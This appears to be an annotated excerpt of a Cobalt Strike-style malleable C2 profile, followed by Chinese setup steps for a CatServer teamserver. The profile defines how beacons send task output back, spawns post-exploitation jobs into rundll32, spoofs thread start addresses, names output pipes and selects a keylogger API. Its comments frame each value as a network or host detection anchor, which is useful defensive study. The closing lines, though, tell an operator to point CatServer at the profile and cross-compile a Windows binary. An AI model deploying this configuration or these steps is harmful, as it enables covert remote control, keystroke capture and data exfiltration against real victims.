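# Indicators for Beacon's HTTP POST transaction (the request that carries task output
# back to the server).
# Reviewer note: the listing had been collapsed so that each '#' comment swallowed the
# directives after it, and adjacent string tokens had lost their separating space.
# It is restored here to one directive per line.
# Every literal below is a fixed value that appears on the wire (URI, header names and
# values, the "user="/"data=" ... "%%" wrappers), so each one is usable as a network
# detection anchor.
http-post {
    # Same as for the GET block: Beacon picks at random from this pool of URIs when
    # several are given. Only one is configured here, so the POST path never varies.
    set uri "/IMXo";

    client {
        #header "Content-Type" "application/octet-stream";

        # Session identifier: masked, NetBIOS-encoded (uppercase), wrapped as
        # "user=" ... "%%" and carried in a request header named "User".
        # (It is NOT sent as /submit.php?id=[identifier]; that older comment was stale.)
        id {
            mask;
            netbiosu;
            prepend "user=";
            append "%%";
            header "User";
        }

        # Task output: masked, base64url-encoded, wrapped as "data=" ... "%%" and
        # sent as the request body.
        output {
            mask;
            base64url;
            prepend "data=";
            append "%%";
            print;
        }
    }

    # The server's response to the HTTP POST. The header set is static, so the same
    # combination is returned on every response.
    server {
        header "Server" "nginx/1.10.3 (Ubuntu)";
        header "Content-Type" "application/octet-stream";
        header "Connection" "keep-alive";
        header "Vary" "Accept";
        header "Pragma" "public";
        header "Expires" "0";
        header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";

        # The server has no payload to return on a POST, so the value being transformed
        # is empty. Presumably the body is then little more than the fixed
        # "data=" ... "%%" wrapper; confirm against captured traffic.
        output {
            mask;
            netbios;
            prepend "data=";
            append "%%";
            print;
        }
    }
}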
# Settings for post-exploitation jobs. All values are static strings, so each leaves a
# repeatable host-side artefact.
post-ex {
    # Temporary process that post-ex jobs are spawned into, one per architecture.
    # No arguments are configured, so the process-creation pattern to look for is
    # rundll32.exe started with an empty command line.
    set spawnto_x86 "c:\\windows\\syswow64\\rundll32.exe";
    set spawnto_x64 "c:\\windows\\system32\\rundll32.exe";

    # Start address (module!function+offset) that threads created for post-ex jobs
    # are made to report.
    set thread_hint "ntdll.dll!RtlUserThreadStart+0x1000";

    # Comma-separated name templates for the named pipes that carry post-ex output.
    # Each '#' is replaced with a random hex digit, so pipe-creation telemetry
    # (e.g. Sysmon Event ID 17) can match on the fixed prefixes.
    set pipename "DserNamePipe##, PGMessagePipe##, MsFteWds##";

    # API the keystroke logger uses to capture input.
    set keylogger "SetWindowsHookEx";
}
修改 CatServer.properties,使其指向刚刚创建的 c2.profile
修改客户端的相关选项为false
编译运行
在 Linux 下交叉编译(目标为 Windows amd64),再运行生成的程序
# Cross-compiles main.go on the build host into a 64-bit Windows executable
# (GOOS=windows, GOARCH=amd64). CGO_ENABLED=0 disables cgo, so the result is a
# pure-Go binary.
CGO_ENABLED=0 GOOS=windows GOARCH=amd64 go build main.go